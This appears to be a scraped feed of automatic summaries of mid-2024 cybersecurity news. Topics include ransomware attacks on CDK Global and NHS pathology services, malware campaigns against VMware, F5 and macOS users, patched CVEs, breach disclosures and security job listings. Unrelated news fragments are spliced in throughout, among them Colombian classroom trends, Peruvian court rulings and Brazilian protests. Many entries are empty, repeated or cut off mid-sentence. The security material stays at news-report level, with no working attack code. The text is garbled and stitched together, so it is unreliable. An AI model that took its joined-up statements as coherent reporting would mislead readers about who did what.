“One or two start the trend and it becomes fashionable in the classroom,” says Lorena (not her real name), a 30-year-old teacher in Cauca, a rural region in south-western Colombia.She says as she enters her class, she is often met by students filming themselves on their smartphones, drawing symbols inspired by the now-demobilised Revolutionary Armed Forces of Colombia guerrilla group (Farc) on the blackboard, or dancing to revolutionary tunes.Now, with the majority of students having phones with internet access, "we can"t control it," she says: "They’re always on them". "Autosummary:
"Organizations have made progress in the past 12 months related to advancing their OT security posture, but there are still critical areas for improvement as IT and OT network environments continue to converge, according to Fortinet. Cyberattacks that compromise OT systems are on the rise In 2023, 49% of respondents experienced an intrusion that impacted either OT systems only or both IT and OT systems. But this year, 73% of organizations are being impacted. The … More
The post Improving OT cybersecurity remains a work in progress appeared first on Help Net Security.
"Autosummary:
At the same time, there was an increase to move OT responsibility to other C-suite roles, including the CIO, CTO and COO, to upwards of 60% in the next 12 months, clearly showing concern for OT security and risk in 2024 and beyond. "Cybersecurity and infosecurity professionals say that work-related stress, fatigue, and burnout are making them less productive, including taking extended sick leave – costing US enterprises almost $626 million in lost productivity every year, according to Hack The Box. Cybersecurity has an essential role to play for businesses, clearly demonstrated by the inclusion of CISOs on the board. With increased numbers of threats rising 600% since the pandemic, the proliferation of criminal groups, and the emergence … More
The post Most cybersecurity pros took time off due to mental health issues appeared first on Help Net Security.
"Autosummary:
90% of CISOs say they are concerned about the impact of stress, fatigue, and burnout on their workforce’s well-being, whereas only 47% of CEOs seem to be equally concerned about their cybersecurity teams’ stress, fatigue, and burnout on increased errors.Cybersecurity and infosecurity professionals say that work-related stress, fatigue, and burnout are making them less productive, including taking extended sick leave – costing US enterprises almost $626 million in lost productivity every year, according to Hack The Box. "Autosummary:
"Autosummary:
"Autosummary:
An unpatched bug allows anyone to impersonate Microsoft corporate email accounts Pierluigi Paganini June 20, 2024 June 20, 2024 A researcher discovered a flaw that allows attackers to impersonate Microsoft corporate email accounts and launch phishing attacks. "Autosummary:
"Autosummary:
"CDK Global, a software-as-a-service (SaaS) provider for car dealers and auto equipment manufacturers, has suffered a cyberattack that has temporarily disrupted its customers’ operations. About CDK and its platform CDK’s platform is used by 15,000+ car dealerships across North America to manage their sales, customer relationships, financing, inventory, customer support, and other aspects of their day-to-day operations. The customers use locally installed apps to access the CDK platform, and round-the-clock access to the platform and … More
The post CDK Global cyberattack cripples 15,000 US auto dealerships appeared first on Help Net Security.
"Autosummary:
About CDK and its platform CDK’s platform is used by 15,000+ car dealerships across North America to manage their sales, customer relationships, financing, inventory, customer support, and other aspects of their day-to-day operations. "Autosummary:
The Guardz unified cybersecurity platform encompasses email security, endpoint security, secure web browsing, phishing simulation, DLP, cyber insurance, and more to provide you with user-centric and automated threat detection and response, giving your clients peace of mind that their business is being secured from the inside out. Alert Fatigue: Too Many Tools, Too Much Noise Since MSPs rely on so many standalone cybersecurity tools to handle daily operations, they are tasked with an overwhelming number of alerts and large volumes of data that need to be ingested and analyzed. : Discuss the main challenges MSPs face, including integration issues, limited visibility across systems, and the high cost and complexity of maintaining diverse tools. "Autosummary:
"Autosummary:
The state"s disaster declaration, issued by Governor Greg Abbott, means that "widespread and severe property damage, injury and loss of life" are possible. "Autosummary:
"Autosummary:
Exploitation attempts on Windows and Linux Source: GreyNoise The most frequently targeted files seen by Greynoise are: \etc/ passwd (contains user account data on Linux) (contains user account data on Linux) /ProgramData/RhinoSoft/Serv-U/ Serv-U-StartupLog.txt (contains startup logs info for the Serv-U FTP server) (contains startup logs info for the Serv-U FTP server) /windows/win.ini (initialization file containing Windows configuration settings) Attackers target those files to escalate their privileges or explore secondary opportunities in the breached network. "Autosummary:
CDK Global is a software-as-a-service platform that provides a full suite of applications to handle a car dealership"s operation, including sales, back office, financing, inventory, and service and support. "Autosummary:
"Ohio-based Crown Equipment, which is among the largest industrial and forklift truck manufacturers in the world, has become a victim of a cyberattack “by an international cybercriminal organization,” the company has finally confirmed to its employees on Tuesday. The confirmation came nine days after the company’s network went down (on June 9) and eight days after its manufacturing plants came to a standstill (on June 10), as reported as reported by German security blogger Günter … More
The post Crown Equipment cyberattack confirmed, manufacturing disrupted for weeks appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
Most of Nobelium campaigns against diplomatic entities use compromised legitimate email accounts belonging to diplomatic staff, and conduct phishing campaigns against diplomatic institutions, embassies, and consulates," the agency said. "Autosummary:
They deployed custom keylogging malware, port scanning tools, credential theft through the dumping of registry hives, a publicly available tool known as Responder that acts as a Link-Local Multicast Name Resolution (LLMNR) NetBIOS Name Service (NBT-NS) and multicast DNS (mDNS) poisoner, and enabling RDP.China-linked spies target Asian Telcos since at least 2021 Pierluigi Paganini June 20, 2024 June 20, 2024 A China-linked cyber espionage group has compromised telecom operators in an Asian country since at least 2021. "Autosummary:
Peruvian ex-soldiers who raped teenagers jailed 4 hours ago By Vanessa Buschschlüter , BBC News Share Getty There were emotional scenes outside the court room A court in Peru has sentenced 10 retired soldiers for raping nine teenage girls and women during the country"s armed conflict decades ago. "Autosummary:
Includes "VirtualShine" (bash shell access through VMCI sockets), "VirtualPie" (file transfer, command execution, reverse shell), and "VirtualSphere" (controller transmitting the commands). The most recent attacks by UNC3886, according to Mandiant, targeted organizations in North America, Southeast Asia, and Oceania, with additional victims identified in Europe, Africa, and other parts of Asia. "Autosummary:
Qilin (also known as Agenda) is a ransomware-as-a-service criminal operation that works with affiliates, encrypting and exfiltrating the data of hacked organisations and then demanding a ransom be paid.And yet, in a series of media interviews, the Qilin ransomware gang has claimed that its attack against the hospitals was not financially-motivated at all, but instead part of a protest against the British government"s involvement in an unspecified war.The Qilin ransomware group has never claimed to have political motivations for its actions in the past, and history has shown that it has no qualms about hitting all kinds of businesses, schools, hospitals and healthcare organisations in its attacks. "Autosummary:
"Autosummary:
Carbon 7th Gen and X1 Yoga 4th Gen devices, but later confirmed with Phoenix that it affects the SecureCore firmware for Alder Lake, Coffee Lake, Comet Lake, Ice Lake, Jasper Lake, Kaby Lake, Meteor Lake, Raptor Lake, Rocket Lake, and Tiger Lake Intel CPUs as well. "Autosummary:
" Apply fix or mitigation now The vendor released fixes for CVE-2024-34102 with the following versions, which e-commerce platform administrators are recommended to apply as soon as possible: Adobe Commerce 2.4.7-p1, 2.4.6-p6, 2.4.5-p8, 2.4.4-p9 Adobe Commerce Extended Support 2.4.3-ext-8, 2.4.2-ext-8, 2.4.1-ext-8, 2.4.0-ext-8, 2.3.7-p4-ext-8 Magento Open Source 2.4.7-p1, 2.4.6-p6, 2.4.5-p8, 2.4.4-p9 Adobe Commerce Webhooks Plugin version 1.5.0 Sansec recommends that site admins switch to "Report-Only" mode before upgrading to avoid an issue that may break checkout functionality. "Autosummary:
Configuration options and commands Source: Recorded Future It also features ESXi-specific commands and options, like "vim-cmd vmsvc/getallvms" and "vim-cmd vmsvc/snapshot.removeall" for snapshot deletion, and "esxcli vm process kill" for shutting down VMs. "Autosummary:
"Application Penetration Tester ShiftCode Analytics | USA | On-site – View job details As an Application Penetration Tester, you will perform Ethical Application Penetration Testing (EAPT) on web applications and APIs. Provide the vulnerability information in the predefined report format after performing the App Pentest using manual methodology and App Pentest tools such as Burp Suite and Web Inspect. Provide assistance to the developers in detailing the vulnerabilities reported along with the recommendations for remediation. … More
The post Cybersecurity jobs available right now: June 19, 2024 appeared first on Help Net Security.
"Autosummary:
Incident Response Analyst HackersEye | Israel | Hybrid – View job details As an Incident Response Analyst, you will investigate and respond to cybersecurity incidents, conduct threat hunting activities using various tools and techniques, prepare detailed incident reports and briefings for clients and internal stakeholders, collaborate with cross-functional teams to enhance security measures and protocols, and train junior staff and contribute to knowledge sharing within the team. Senior IAM Engineer Trade Republic | Germany | Remote – View job details As a Senior IAM Engineer, you will design, develop, test, implement, and integrate Identity and Access Management (IAM) systems and solutions. Cyber Sec Gov & Risk Analyst UNSW | Australia | On-site – View job details As a Cyber Sec Gov & Risk Analyst, you will maintain cyber security policies and standards, periodically review, update, and align them with the overall policy framework and manage exemptions. Information Technology Specialist (Information Security) U.S. Immigration and Customs Enforcement (ICE) | USA | Remote – View job details As an Information Technology Specialist (Information Security), you will implement high-level security requirements such as those relating from laws, regulations, and presidential directives. "This article compiles excerpts from various reports, presenting statistics and insights on cybersecurity threats faced by businesses and individuals alike. Cyber insurance isn’t the answer for ransom payments Veeam | 2024 Ransomware Trends Report | June 2024 Ransomware remains an ongoing threat for organizations and is the largest single cause of IT outages and downtime as 41% of data is compromised during a cyberattack. Alarmingly, 63% of organizations are at risk of reintroducing infections while … More
The post Find out which cybersecurity threats organizations fear the most appeared first on Help Net Security.
"Autosummary:
Proofpoint | 2024 Voice of the CISO | May 2024 In 2024, 70% of CISOs surveyed feel at risk of experiencing a material cyber attack in the next 12 months, compared to 68% in 2023 and 48% in 2022. "Action1 researchers found an alarming increase in the total number of vulnerabilities across all enterprise software categories. “With the NVD’s delay in associating Common Vulnerabilities and Exposures (CVE) identifiers with CPE (Common Platform Enumeration) data, our report comes at a critical moment, providing much-needed insights into the evolving vulnerability landscape for enterprise software,” said Mike Walters, President of Action1. “Our goal is to arm key decision makers with essential knowledge so that they can prioritize … More
The post Rising exploitation in enterprise software: Key trends for CISOs appeared first on Help Net Security.
"Autosummary:
“With the NVD’s delay in associating Common Vulnerabilities and Exposures (CVE) identifiers with CPE (Common Platform Enumeration) data, our report comes at a critical moment, providing much-needed insights into the evolving vulnerability landscape for enterprise software,” said Mike Walters, President of Action1. "Cryptocurrency users are being targeted with legitimate-looking but fake apps that deliver information-stealing malware instead, Recorded Future’s researchers are warning. The threat actor behind this complex scheme is going after both Windows and Mac users, and leverages social media and messaging platforms to trick them into installing the apps, i.e., the malware. How cryptocurrency users get tricked into downloading the malware Vortax – supposedly in-browser virtual meeting software – looks like a legitimate app at … More
The post Clever macOS malware delivery campaign targets cryptocurrency users appeared first on Help Net Security.
"Autosummary:
How cryptocurrency users get tricked into downloading the malware Vortax – supposedly in-browser virtual meeting software – looks like a legitimate app at first glance: It has a website indexed by major search engines and an associated Medium blog with suspected AI-generated articles The website provides a physical address for the company and contains claims about Fortune 500 companies as customers and awards received from tech publications It has a “verified” X account, as well as Telegram and Discord accounts After asking a direct question or while engaging in discussions on cryptocurrency-themed channels, potential targets are instructed by Vortax accounts to visit the site, click on the “Try Vortax for free” button, and enter the provided Room ID to be able to download the application. "Autosummary:
"This campaign, primarily targeting cryptocurrency users, marks a significant rise in macOS security threats and reveals an expansive network of malicious applications," the cybersecurity company noted, describing markopolo as "agile, adaptable, and versatile. "Autosummary:
"Instead, they demanded a call with their business development team (i.e. their sales reps) and have not agreed to return any funds until we provide a speculated $ amount that this bug could have caused if they had not disclosed it," claimed Percoco. "Autosummary:
" Some of the other malware families delivered during the course of attacks aimed at VMware instances are below - A trojanized version of a legitimate TACACS daemon with credential-logging functionality VIRTUALSHINE, a VMware VMCI sockets-based backdoor that provides access to a bash shell VIRTUALPIE, a Python backdoor that supports file transfer, arbitrary command execution, and reverse shell capabilities VIRTUALSPHERE, a controller module associated with a VMCI-based backdoor Over the years, virtual machines have become lucrative targets for threat actors owing to their widespread use in cloud environments. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
CDK Global provides clients in the auto industry a SaaS platform that handles all aspects of a car dealership"s operation, including CRM, financing, payroll, support and service, inventory, and back office operations. These negotiations can take weeks, and if a ransom is not paid, the threat actors ultimately leak the corporate data, which usually includes the personal information of employees and, potentially, customers. "Autosummary:
Details of the incident were shared by Kraken"s Chief Security Officer, Nick Percoco, on X (formerly Twitter), stating it received a Bug Bounty program alert about a bug that "allowed them to artificially inflate their balance on our platform" without sharing any other details The company said it identified a security issue within minutes of receiving the alert that essentially permitted an attacker to "initiate a deposit onto our platform and receive funds in their account without fully completing the deposit. "Autosummary:
With IT systems down, employees have been unable to clock in their hours, access service manuals, and, we are told, deliver machinery in some cases. "The cyber threat landscape in 2023 and 2024 has been dominated by mass exploitation, according to WithSecure. Edge service KEV vulnerability trends 64% of all edge service and infrastructure Common Vulnerabilities and Exposures (CVEs) in the Known Exploited Vulnerability Catalogue (KEV) exist above the 97.5th percentile of EPSS scores (a metric that scores CVEs based on the likelihood of exploitation). Only 23% of all other CVEs in the KEV are above the 97.5th percentile. Furthermore, … More
The post Mass exploitation is the new primary attack vector for ransomware appeared first on Help Net Security.
"Autosummary:
There has been a rapid tempo of security incidents caused by the mass exploitation of vulnerable software such as MOVEit, CitrixBleed, Cisco XE, Fortiguard’s FortiOS, Ivanti ConnectSecure, Palo Alto’s PAN-OS, Juniper’s Junos, and ConnectWise ScreenConnect. "Cybersecurity isn’t just about firewalls and antivirus. It’s about understanding how your defenses, people, and processes work together. Just like Google Maps revolutionized navigation, process mapping can revolutionize how you understand and manage your security landscape. We used to wrestle with paper maps to navigate new places. This was dangerous and inconvenient. Reading a map while driving means you do neither well. Then came the seemingly magical turn-by-turn GPS systems from the likes of Garmin … More
The post How to create your cybersecurity “Google Maps”: A step-by-step guide for security teams appeared first on Help Net Security.
"Autosummary:
Mapping your never-ending security evolution Although it’s an amazing product, we all run into errors on Google Maps — stores or restaurants that are closed, distances that are slightly off, directions that tell you to turn left at an intersection with a “No Left Turn” sign. Link your map to your SIEM, ticketing system, chat, email and security orchestration tools, etc.Integrate with your tools: Link your map to your SIEM, ticketing system, chat, email and security orchestration tools, etc.The ideal tool lets you create dynamic, interactive process maps that can be updated in real-time and filtered on any critical attribute (role, condition, location, type of process) "Autosummary:
"Vendors on Empire Market offered to sell various illicit goods and services, including controlled substances such as heroin, methamphetamine, cocaine, and LSD, as well as counterfeit currency and stolen credit card information," the DoJ said, citing a superseding indictment announced last week. "Autosummary:
A multi-pronged approach, including strengthening cyber defenses, improving regulations, and raising awareness, is crucial to mitigating the risk and impact of ransomware.Her experience spans B2B tech, with a lot of focus on cybersecurity, cloud, enterprise, digital transformation, and data centre.Her specialties are in news, thought leadership, features, white papers, and PR writing, and she is an experienced editor for both print and online publications. "Autosummary:
Umeti is scheduled to be sentenced on August 27, 2024, and faces a maximum penalty of up to 102 years in prison for charges which include wire fraud conspiracy, intentional damage to a protected computer, and multiple wire fraud counts. "SUSE announced a new SUSE Liberty Linux offering to help protect CentOS systems from future vulnerabilities. SUSE Liberty Linux Lite for CentOS 7 is a frictionless solution that provides customers with updates and security patches for their existing CentOS system, with no migration whatsoever. This gives customers the security and certainty of uninterrupted, SUSE enterprise Linux support, without the hassle and disruption of switching OS on-premises or in the cloud. “Open source technologies are the … More
The post SUSE announces Liberty Linux Lite for CentOS 7 appeared first on Help Net Security.
"Autosummary:
“Open source technologies are the cornerstone of innovation for enterprises, fostering collaboration, agility, and cost-effectiveness,” said Rick Spencer, GM of Business Critical Linux, SUSE. "Autosummary:
" The shell script, "ar.sh," performs a number of actions, including setting up a working directory, installing tools to scan the internet for vulnerable hosts, disabling firewall, and ultimately fetching the next-stage payload, referred to as "chkstart. "Autosummary:
Black Basta ransomware group claims to have stolen ≈530 GB of data, including HR, Finance, Engineering documents, Corporate data, and home users data. "Autosummary:
While everybody shares some type of device, account, or location access with their significant other (100% of respondents), and plenty grant their significant other access to at least one personal account (85%), a sizeable portion longs for something different—31% said they worry about “how easy it is for my partner to track what I’m doing and where I am all times because of how much we share,” and 40% worry that “telling my partner I don’t want to share logins, PINs, and/or locations would upset them.” By surveying 500 people in committed relationships in the United States, Malwarebytes has captured a unique portrait of what it means to date, marry, and be in love in 2024—a part of life that is now inseparable from smart devices, apps, and the internet at large. "The 2022 Medibank data breach / extortion attack perpetrated by the REvil ransomware group started by the attackers leveraging login credentials stolen from a private computer of an employee of a Medibank’s IT contractor. According to a statement by the Australian Information Commissioner (AIC) filed with the Federal Court of Australia, the credentials were stolen by way of infostealer malware, after that employee “saved his Medibank username and password for a number of Medibank accounts … More
The post Medibank breach: Security failures revealed (lack of MFA among them) appeared first on Help Net Security.
"Autosummary:
According to a statement by the Australian Information Commissioner (AIC) filed with the Federal Court of Australia, the credentials were stolen by way of infostealer malware, after that employee “saved his Medibank username and password for a number of Medibank accounts to his personal internet browser profile on the work computer he used to provide IT services to Medibank”, and then signed into his internet browser profile on his personal computer. "Fraudely announced a low-cost, setup-free solution to enable SMBs to immediately protect their employees against phishing attacks. Phishing scams remain one of the most prevalent cyber threats, costing businesses billions of dollars annually. These attacks attempt to trick employees into revealing sensitive information or clicking malicious links that can compromise entire networks. “SMBs are targeted by phishers because they often lack the resources, the infrastructure, and the training to recognize and stop phishing attacks,” says … More
The post Fraudely empowers SMBs to protect their employees against phishing attacks appeared first on Help Net Security.
"Autosummary:
Fraudely’s anti-phishing solution includes: On-demand safety checks by phishing experts : Employees simply forward suspicious emails to Fraudely for our team to analyze and report back. "Autosummary:
Similarly, users who end up selecting the "Auto-fix" are displayed WebDAV-hosted files named "fix.msi" or "fix.vbs" in Windows Explorer by taking advantage of the "search-ms:" protocol handler. "Autosummary:
"Autosummary:
: Includes true login, one-time passwords, country blocking, custom page titles, password loops, Telegram integration, and custom logos. "Autosummary:
Today, the vendor released fixes for three vulnerabilities, namely CVE-2024-37079, CVE-2024-37080, CVE-2024-37081, summarized as follows: CVE-2024-37079 : "Autosummary:
This data included customers" names, dates of birth, addresses, phone numbers, email addresses, Medicare numbers, passport numbers, health-related information, and claims data (such as patient names, provider names, primary/secondary diagnosis and procedure codes, and treatment dates. "Autosummary:
A 47.7GB database belonging to the health club was discovered by cybersecurity researcher Jeremiah Fowler, who told The Register he had also uncovered images of members" identity documents, banking and payment card details, phone numbers, and even - in some cases - immigration records. "Autosummary:
"Autosummary:
"Following installation of the Windows update released April 23, 2024 (KB5036979)and updates released after that, certain apps might display an "Open With" dialog box asking, "How do you want to open this file?"," reads the status update. "Autosummary:
"Autosummary:
"Autosummary:
The structure of this service, also known as “Drops for Stuff,” distinguished “drops,” people who responded to job ads from home to drop off packages, from “stuffers,” individuals in possession of stolen credit card numbers who paid a fee for drop-off to the Swat service. In this regard, the State Police’s latest operation “EMMA 9,” a vast action to combat cyber money laundering coordinated by Europol and conducted in 28 countries, uncovered 2,729 fraudulent transactions, identified 879 money mules and foiled fraud worth more than 6 million euros. "Argus Cyber Security is collaborating with Microsoft to build a next generation, end-to-end platform for automotive and mobility security. This Argus Vehicle Security Platform consists of two integrated solutions that combine Argus’ automotive cybersecurity portfolio with robust software development and security products from Microsoft, one of the world’s most innovative technology companies and a leader in GenAI. In recent years, vehicle manufacturers have come to realize the importance of Software Defined Vehicles (SDV) and integrating … More
The post Argus Cyber Security and Microsoft partner to secure automotive fleets throughout the vehicle lifecycle appeared first on Help Net Security.
"Autosummary:
The second solution, known as “Automotive Security Lifecycle Management,” integrates the Argus XDR threat detection and response product for automotive on Azure with robust security operations and management tools from Microsoft, including Microsoft Sentinel, Defender for Cloud, Defender Threat Intelligence and Azure OpenAI Service. "Attackers are increasingly using a clever social engineering technique to get users to install malware, Proofpoint researchers are warning. The message warns of a problem but also offers a way to fix it (Source: Proofpoint) Social engineering users to install malware Getting users to install malware on their computers was always a matter of finding the right lure and bypassing security protections. As the latter get better (and broader) and users’ awareness of attackers’ usual … More
The post Malware peddlers love this one social engineering trick! appeared first on Help Net Security.
"Autosummary:
"Autosummary:
The compromised information varied for each individual, potentially exposed information included the patient’s first and last name, date of birth, home address, phone number(s), e-mail address, medical record number, client identification number, dates of service, and/or medical information (e.g., diagnosis/condition, treatment, test results, medications), and/or health plan information. "Autosummary:
Sadly, even paying a ransom does not guarantee the complete deletion of stolen data, with past incidents demonstrating that threat actors don"t always keep their promise and data was sold to other threat actors, leaked on data leak sites, or used to extort the company again. "Autosummary:
Re-infection chain Source: Sygnia Sygnia reports that despite extensive eradication efforts following the breach"s discovery, the hackers re-deployed PlugX with new configurations to avoid detection, using compromised internal devices like the F5 appliances to retain access. Other malware deployed on the F5 BIG-IP appliance includes: PMCD : Connects to the C&C server hourly, executes commands received from the server via "csh", maintaining remote control. "Autosummary:
Show notes and credits: Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com) Licensed under Creative Commons: By Attribution 4.0 License http://creativecommons.org/licenses/by/4.0/ Outro Music: “Good God” by Wowa (unminus.com) Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it. "Autosummary:
China-linked Velvet Ant uses F5 BIG-IP malware in cyber espionage campaign Pierluigi Paganini June 17, 2024 June 17, 2024 Chinese cyberespionage group Velvet Ant was spotted using custom malware to target F5 BIG-IP appliances to breach target networks.The tool was utilized in the past by multiple China-linked APT groups, including ‘Volt Typhoon’, ‘APT27’ and ‘Gelsemium’. "Autosummary:
"Autosummary:
MFA can stop, or at least blunt, brute force attacks, especially Business Email Compromise (BEC), which is a perpetual concern. "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Users of JetBrains IDEs at risk of GitHub access token compromise (CVE-2024-37051) JetBrains has fixed a critical vulnerability (CVE-2024-37051) that could expose users of its integrated development environments (IDEs) to GitHub access token compromise. 20,000 FortiGate appliances compromised by Chinese hackers Coathanger – a piece of malware specifically built to persist on Fortinet’s FortiGate appliances – may still be lurking … More
The post Week in review: JetBrains GitHub plugin vulnerability, 20k FortiGate appliances compromised appeared first on Help Net Security.
"Autosummary:
New infosec products of the week: June 14, 2024 Here’s a look at the most interesting products from the past week, featuring releases from Acronis, Diligent, Entrust, KELA, Plainsea, and SentinelOne. GDPR turns six: Expert discusses AI impact In this Help Net Security video, Chris Denbigh-White, CSO at Next DLP, discusses how emerging technologies, such as AI, have presented new data protection challenges and how organizations must balance deployment and legality. "Autosummary:
"Autosummary:
TIKTAG-v2 code Source: arxiv.org If the tags match, the value is forwarded, and the load succeeds, influencing the cache state, while in the case of a mismatch, the forwarding is blocked, and the cache state remains unchanged. "Autosummary:
Targets of the campaign, which has been ongoing since April 2024, include government, health, and education organizations as well as financial, manufacturing, food, services, and transportation industries in Colombia. "Autosummary:
"Autosummary:
When DISGOMOJI is launched, the malware will exfiltrate system information from the machine, including IP address, username, hostname, operating system, and the current working directory, which is sent back to the attackers. "Autosummary:
O Negative blood is a universal blood type, anyone can receive it, for this reason, it is crucial in emergencies or when a patient’s blood type is unknown. “England’s top doctor has today (Monday 10 June) backed calls from NHS Blood and Transplant (NHSBT) for O Positive and O Negative blood donors to urgently book appointments to donate in one of the 25 town and city centre NHS Blood Donor Centres in England, to boost stocks of O type blood following the cyber incident in London.”“Unfortunately, some operations and procedures which rely more heavily on pathology services have been postponed, and blood testing is being prioritised for the most urgent cases, meaning some patients have had phlebotomy appointments cancelled.” "Autosummary:
"Jade Sleet"s packages, discovered throughout summer 2023, were designed to work in pairs, with each pair being published by a separate npm user account to distribute their malicious functionality," Checkmarx researchers Tzachi Zornstein and Yehuda Gelb said. "Autosummary:
City of Cleveland still working to fully restore systems impacted by a cyber attack Pierluigi Paganini June 14, 2024 June 14, 2024 Early this week, the City of Cleveland suffered a cyber attack that impacted multiple services. "Autosummary:
Two Ukrainians accused of spreading Russian propaganda and hack soldiers’ phones Pierluigi Paganini June 14, 2024 June 14, 2024 Ukraine’s security service (SBU) detained two individuals accused of supporting Russian intelligence in spreading propaganda and hacking soldiers’ phones. "Autosummary:
"Autosummary:
In this must-attend webinar, you"ll learn: How to adapt your data security strategies to keep pace with explosive data growth Best practices for managing access control and monitoring in petabyte-scale environments Strategies for mitigating risks associated with third-party data access and data movement Insights into the unique security challenges posed by LLM model training Future-proofing your data security approach for the era of big data Whether you"re a CISO, security engineer, IT professional, or business leader, if you"re responsible for protecting your company"s data, this webinar is essential. "Autosummary:
While memos issued by hospital officials revealed this "ongoing critical incident" has had a "major impact" on their procedures and operations (including blood transfusions and blood testing), the NHS said two days after the incident that emergency services like A&E, urgent care centers, and maternity departments are open as usual although some operations and procedures relying on pathology services had to be postponed. "Autosummary:
Since then, the gang has breached many high-profile victims, including German defense contractor Rheinmetall, U.K. technology outsourcing company Capita, the Toronto Public Library, the American Dental Association, government contractor ABB, Hyundai"s European division, Yellow Pages Canada, and U.S. healthcare giant Ascension. "Autosummary:
Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. Protecting yourself after a data breach There are some actions you can take if you are, or suspect you may have been, the victim of a data breach. "Autosummary:
Protests across Brazil over divisive abortion law 2 hours ago By Malu Cursino , BBC News Share Reuters Thousands of people in Brazil have protested against a proposed nationwide law change which would equate abortion to homicide, even in cases where a pregnancy is the result of rape. "Autosummary:
Keytronic entry on Black Basta data leak site Source: BleepingComputer The threat actors claim that human resources, finance, engineering, and corporate data were stolen in the attack, sharing screenshots of employees" passports and social security cards, customer presentations, and corporate documents. "“Businesses across every industry face unprecedented challenges posed by an increasing attack surface, zero-day vulnerabilities, cloud misconfigurations, and new emerging threats driven by AI,” said Andrei Florescu, president and GM of Bitdefender Business Solutions Group. “The findings of our recent survey underscore a now vital approach to cybersecurity that layers threat prevention, protection, detection, and response across all environments, including cloud infrastructure, services, and supply chains. The goal of effective cybersecurity is not only stopping … More
The post GenAI keeps cybersecurity pros on high alert appeared first on Help Net Security.
"Autosummary:
At 73.5%, UK respondents experienced the most data breaches or leaks Germany at 61%, and Singapore experienced the least at 33% (24% below the average). "Autosummary:
"Autosummary:
It"s equipped to launch a reverse shell, download/upload files, schedule execution, and initiate SOCKS tunneling, with the attacks leveraging known security flaws in public-facing applications to breach Linux servers and drop a web shell for remote access and malware delivery. "An OS command injection vulnerability in Windows-based PHP (CVE-2024-4577) in CGI mode is being exploited by the TellYouThePass ransomware gang. Imperva says the attacks started on June 8, two days after the PHP development team pushed out fixes, and one day after Watchtowr researchers published a technical analysis of the flaw and proof-of-concept exploit code. About CVE-2024-4577 Discovered and reported by Orange Tsai, principal security researcher at Devcore, CVE-2024-4577 allows attackers to bypass the protections … More
The post PHP command injection flaw exploited to deliver ransomware (CVE-2024-4577) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"For example, "FOXTROT," "CLOUDINFINITY," and "CHATICO" are names given to all Android-based GravityRAT infections whereas "CRAFTWITHME," "SEXYBER," and "CVSCOUT" are names for attacks deploying HeavyLift. "Autosummary:
"Autosummary:
"For nearly four years, Rui-Siang Lin allegedly operated "Incognito Market," one of the largest online platforms for narcotics sales, conducting $100 million in illicit narcotics transactions and reaped millions of dollars in personal profits," James Smith, the assistant director in charge of the FBI New York field office, said. "Autosummary:
Updates to address this issue are available for supported Pixel devices, such as Pixel 5a with 5G, Pixel 6a, Pixel 6, Pixel 6 Pro, Pixel 7, Pixel 7 Pro, Pixel 7a, Pixel 8, Pixel 8 Pro, Pixel 8a, and Pixel Fold. "Autosummary:
Impersonation scammers will often put some effort into making their fraudulent communications look more convincing, such as spoofing phone numbers, email addresses, or even creating profiles on social media to appear as if they are from a government department, the police, or a bank. "Autosummary:
Some of the fake-but-functional apps claim to be secure messaging services such as LapizaChat, NortirChat, and ReblyChat, each of which is based on legitimate apps like StealthChat, Session, and Voxer Walkie Talkie Messenger, while another app purports to be from the Palestinian Civil Registry. "Autosummary:
Google fixed an actively exploited zero-day in the Pixel Firmware Pierluigi Paganini June 13, 2024 June 13, 2024 Google is warning of a security vulnerability impacting its Pixel Firmware that has been actively exploited in the wild as a zero-day. "Autosummary:
The information stolen during the incident includes first and last names, as well as various combinations of affected individuals" phone numbers, email addresses, mailing addresses, nationality, bio, website URLs, and social media usernames. "Autosummary:
"Autosummary:
As a result of this breach, Panera suffered a massive outage that affected its internal IT systems, phones, point of sales system, website, and mobile apps. "Autosummary:
"The "knowing the username" problem "kind of" can be solved with the following solution: assuming there exists a user named administrator@evilcorp.local, one can find the domain name by looking at the CN field of the SSL certificate, and the username can be sprayed," explains the researchers at the Summoning Team. "Autosummary:
In the US, just under 27% of paid days last month were work-from-home days, compared with more than 60% at the height in 2020, according to research by professors at the Instituto Tecnológico Autónomo de México (ITAM) Business School, Stanford and University of Chicago. "Autosummary:
"Autosummary:
"Cloud Security Engineer Metacore | Germany | Hybrid – View job details As a Cloud Security Engineer, you will develop, implement, and maintain cloud security architecture, policies, and procedures. You will collaborate with game and infrastructure teams to identify, evaluate, and mitigate security risks, and integrate security into the company’s development lifecycle. Additionally, you will develop and further improve the security of cloud infrastructure, emphasizing automated, reusable, and architecturally sound solutions. Cloud Security Operations and … More
The post Cybersecurity jobs available right now: June 12, 2024 appeared first on Help Net Security.
"Autosummary:
CSOC Analyst Northrop Grumman | United Kingdom | Hybrid – View job details As a CSOC Analyst, you will perform analytical duties to include security monitoring, host and network based log analysis, correlation of network threat indicators and PCAP data, analytical triage, incident response (both intrusion and privacy related). Senior Penetration Tester Logisek | Greece | Remote – View job details As a Senior Penetration Tester, will conduct penetration testing, security assessments, and deliver clear and concise security reports to our clients in Greece, USA, Europe and Middle East. Vice President Information Security Influx | Indonesia | Remote – View job details Vice President Information Security will be responsible for protecting Influx from information security risks through the development, implementation, and maintenance of company’S security program (policies, procedures, and standards). "Autosummary:
" Also resolved by Redmond are several other RCE bugs affecting Microsoft Outlook (CVE-2024-30103), Windows Wi-Fi Driver (CVE-2024-30078), and numerous privilege escalation flaws in Windows Win32 Kernel Subsystem (CVE-2024-30086), Windows Cloud Files Mini Filter Driver (CVE-2024-30085), and Win32k (CVE-2024-30082), among others. "Recent cyberattacks targeting the nation’s healthcare system have demonstrated the vulnerability of hospitals and payment systems. Providers across the health system had to scramble for funding after one attack on a key payment system. And some hospitals had to redirect care after another. These disruptions can take too long to resolve before full access to needed health care services or payment systems is restored. Cyberattacks against the American healthcare system rose 128% from 2022 to … More
The post Major cybersecurity upgrades announced to safeguard American healthcare appeared first on Help Net Security.
"Autosummary:
